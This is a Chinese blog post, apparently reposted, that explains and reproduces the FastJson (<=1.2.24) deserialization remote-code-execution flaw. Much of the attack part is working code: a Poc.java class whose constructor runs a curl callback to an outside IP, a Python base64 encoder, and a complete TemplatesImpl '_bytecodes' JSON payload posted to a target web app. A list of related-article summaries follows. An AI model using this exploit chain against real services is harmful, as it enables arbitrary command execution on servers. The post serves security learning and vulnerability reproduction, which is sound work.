FastJson反序列化漏洞

最新推荐文章于 2024-05-20 23:13:23 发布
最新推荐文章于 2024-05-20 23:13:23 发布
阅读量1k 收藏
点赞数
文章标签: json java ldap
原文链接:https://yq.aliyun.com/articles/676234
版权

参考文献:https://kevien.github.io/2018/06/18/FastJson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E(%E7%BB%AD)/
https://paper.seebug.org/636/
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4686.html
jar包下载:https://mvnrepository.com/artifact/com.alibaba/fastjson/1.2.47

Fastjson概念

Fastjson可以将java的对象转换成json的形式,也可以用来将json转换成java对象,它的JSONString()方法可以将java的对象转换成json格式,同样通过parseObject方法可以将json数据转换成java的对象

一个栗子

序列化
PS:需导入fastjson.jar

  • User.java
package fastjsondemo;
import java.io.IOException;
public class User {
    public String Username;
    private String password ;
    public String getUsername() {
        return Username;
    }
    public void setUsername(String username) {
        Username = username;
    }
    public String getPassword() {
        return password;
    }
    public void setPassword(String password) {
        this.password = password;
    }
    public User() throws IOException{
        Runtime.getRuntime().exec("calc.exe");
    }
}
  • Test1.java
package fastjsondemo;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class Test1 {
    public static void main(String[] args){
        User user = new User();
        user.setUsername("admin");
        user.setPassword("123456");
        String entity1= JSON.toJSONString(user);
        System.out.println(entity1);
        
        String entity2 = JSON.toJSONString(user,SerializerFeature.WriteClassName);
        System.out.println(entity2);
    }
}

img_8d3afa37ebd3e3bf0a9ed1e2a75fd34f.png

反序列化
FastJson中的 parse()parseObject()方法都可以用来将 JSON字符串反序列化成Java对象。但是 parseObject()会额外的将 Java对象转为 JSONObject对象,即 JSON.toJSON()parse() 会识别并调用 目标类的 setter 方法及某些特定条件的 getter 方法,而 parseObject()在处理过程中会调用反序列化目标类的所有 settergetter方法。 

String json1="{\"Username\":\"root\",\"password\":\"123456\"}";
String json2="{\"@type\":\"fastjsondemo.User\",\"Username\":\"root\",\"password\":\"123456\"}";
Object obj = JSON.parseObject(json1,User.class);
System.out.println(obj);
Object obj1 = JSON.parseObject(json2,User.class);
System.out.println(obj1);
img_1ea79be8c2dabebc604d04ae9df716fe.png

img_ca60c7256da03edcc3d70eb6f7e0e6d6.png

PS:json反序列化时会自动调用无参构造器里的方法,导致计算器弹出
password字段设置的是私有属性,FastJson无权直接去反序列化私有字段。

复现fastjson 反序列化导致任意命令执行漏洞 
version: FastJson<=1.2.24

环境搭建什么的就不说了,按照大佬给的步骤就行了

  • 这是一个web应用,访问返回“Hello world”。正常POST一个json,目标会提取json对象中的name和age拼接成一句话返回:


    img_36cd93ca9f3a9e98caee3ec13650529c.png

    img_319937b6a596f768f7520241375aefa6.png

漏洞原理:

  • 原理
    fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并通过json来填充其属性值。而JDK自带的类com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl中有一个私有属性_bytecodes,其部分方法会执行这个值中包含的Java字节码。
    想要使用TemplatesImpl_bytecodes属性执行任意命令,有几个条件:
    ①目标网站使用fastjson库解析json
    ②解析时设置了Feature.SupportNonPublicField,否则不支持传入私有属性
    ③目标使用的jdk中存在TemplatesImpl
  • 调用链(偷大佬的图)
    img_d4d76e3e78b7ddb8bdd65dab133b9f91.png

    利用方式
  • poc.java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import java.io.IOException;

public class Poc extends AbstractTranslet {    #强制类型转化为AbstractTranslet类

    public Poc() throws IOException {
        Runtime.getRuntime().exec("curl http://120.xxx.xxx.xxx:8989");
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) {
    }

    @Override
    public void transform(DOM document, com.sun.org.apache.xml.internal.serializer.SerializationHandler[] haFndlers) throws TransletException {
    }
    public static void main(String[] args) throws Exception {
        Poc t = new Poc();
    }
}
  • 执行命令javac Poc.java
  • 1.py(将Poc.class里面的内容base64加密(FastJson提取byte[]数组字段值时会进行Base64解码,所以构造payload时需要对 _bytecodes 进行Base64处理))
import base64
fin = open(r"Poc.class", "rb")
fout = open(r"en.txt", "w")
s = base64.encodestring(fin.read()).replace("\n", "")
fout.write(s)
fin.close()
fout.close()
  • payload
{"name":{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVAAm7AAVZtwAGTLEAAAACAAsAAAAKAAIAAAAZAAgAGgAMAAAAFgACAAAACQAfACAAAAAIAAEAIQAOAAEADwAAAAQAAQAiAAEAIwAAAAIAJA=="],"_name":"a.b","_tfactory":{ },"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"},age:12}
img_b05f05aada2890b9a13d26de582b4163.png
img_fc412aa8f2c8d2b4b768364591bb8b58.png
weixin_34392906
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
fastjson反序列化漏洞
scu_hacker博客
02-10 3191
目录 前言 一、漏洞原理 二、漏洞复现 2.1 fastjson<=1.2.24 2.2 1.2.24<=fastjson<=1.2.47 2.2.1在攻击机上编译类 2.2.2 开启rmi和ldap服务 2.2.3 写入poc 参考资料 前言 fastjson是阿里开发的json解析库,可以将java对象解析为json,也可以将json反序列化java对象,主要用json.parse()方法进行反序列化。 一、漏洞原理 ...
Fastjson反序列化漏洞基础
洋洋的小黑屋
07-30 177
Fastjson反序列化漏洞基础 FastJson是alibaba的一款开源JSON解析库,可用于将Java对象转换为其JSON表示形式,也可以用于将JSON字符串转换为等效的Java对象。 0x0 简单使用 pom.xml加入FastJson <dependency> <groupId>com.alibaba</groupId> <artifactId>fastjson</artifactId> <version>1.2.24<
Fastjson反序列化漏洞
热门推荐
LJH1999ZN的博客
03-31 3万+
一、fastjson简介 fastjsonjava的一个库,可以将java对象转化为json格式的字符串,也可以将json格式的字符串转化为java对象 提供了 toJSONString() 和 parseObject() 方法来将 Java 对象与 JSON 相互转换。调用toJSONString方 法即可将对象转换成 JSON 字符串,parseObject 方法则反过来将 JSON 字符串转换成对象。 二、fastjson反序列化漏洞原理 在反序列化的时候,会进入parseField方法,进
FastJson 反序列化漏洞原理分析
buffedon的博客
08-01 8723
FastJson 反序列化漏洞原理分析FastJson 简介漏洞原理FastJson 序列化操作序列化反序列化调用链分析原理利用过程分析RMI 的实现JNDI服务器端代码构造总结1. fastjson 利用过程2. 恶意类怎么上传到服务端3. fastjson rce的原理参考 FastJson 简介 fastjson框架下载:https://github/alibaba/fastjson fastjson-jndi 下载:https://github.com/earayu/fastjson_jndi_po
fastjson反序列化漏洞原理
最新发布
m0_73649671的博客
05-20 985
fastjson反序列化漏洞原理
fastjson反序列化漏洞原理及利用
weixin_43769253的博客
07-29 6913
fastjson反序列化漏洞原理及利用
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-12 2万+
本文是Fastjson1.2.24漏洞复现,包括漏洞原理、漏洞利用(远程创建文件)、漏洞利用(反弹shell)。使用vulhub靶场进行搭建,保姆级教程,还望大家多多支持。
安全漏洞Fastjson反序列化漏洞
孤芳不自赏
05-27 1万+
引言 昨天,我收到了集团安全部门的告警消息:Fastjson≤1.2.80版本存在反序列化漏洞,好家伙,着手开搞,这又是一个不眠夜的开始,哦,为什么说“又”呢?还记得去年12月份log4j2报过重大安全漏洞…… 风险描述 fastjson已使用黑白名单用于防御序列化漏洞,经研究该利用在特定条件下可绕过默认autoType关闭限制,攻击远程服务器,风险影响较大。建议fastjson用户尽快采取安全措施保障系统安全 影响版本 Fastjson≤1.2.80 解决方案1:升级到最新版本1.2.83..
Fastjson 反序列化漏洞
m0_65150886的博客
10-10 628
Fastjson在1.2.24以及之前版本存在远程代码执行高危安全漏洞Fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链Fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
Fastjson反序列化漏洞原理与复现
FisrtBqy的博客
05-15 3324
Ffasjson反序列化漏洞原理与复现
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6292
简单讲解Fastjson反序列化漏洞,简单讲述漏洞利用shell
fastjson反序列化漏洞学习(一)
一剑开天门!的博客
02-10 3667
Fastjson 反序列化漏洞产生的原因通常是由于 Fastjson 库在反序列化 JSON 数据时存在安全漏洞。这些漏洞可以被攻击者利用来执行任意代码、访问系统文件、读取敏感数据等危险操作。
FASTJSON反序列化漏洞合集分析小记(一)
lmh666888的博客
06-26 1728
FASTJSON反序列化漏洞合集分析小记
[Java安全]—fastjson漏洞利用
Sentiment的博客
07-03 5433
这两天要出去就不再学新东西了,正好两点睡不着了,起来学学fastjson弥补一些接下来的内容。Fastjson 组件是阿里巴巴开发的反序列化与序列化组件Fastjson组件在反序列化不可信数据时会导致远程代码执行。究其原因:依赖 POJO POJO 是 Plain OrdinaryJava Object 的缩写,但是它通指没有使用 Entity Beans 的普通 java 对象,可以把 POJO 作为支持业务逻辑的协助类Demo 结果: test1可以看到调用时会自动调用对应的其次是若加上,则返回的内容除
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 2663
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题
Fastjson反序列化漏洞利用原理和POC
u012990687的专栏
11-30 1万+
0x01 前言 FastJson是开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化Java Bean。Fastjson应用范围非常广,在github上star数超过22k。2017年3月15日,fastjson官方主动爆出fastjson在1.2.24及之前版本存在远程代码执行高危安全漏洞。攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。2020年6月1日 fastjson爆发新的反序列化远程代码执行漏洞,fastjso

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值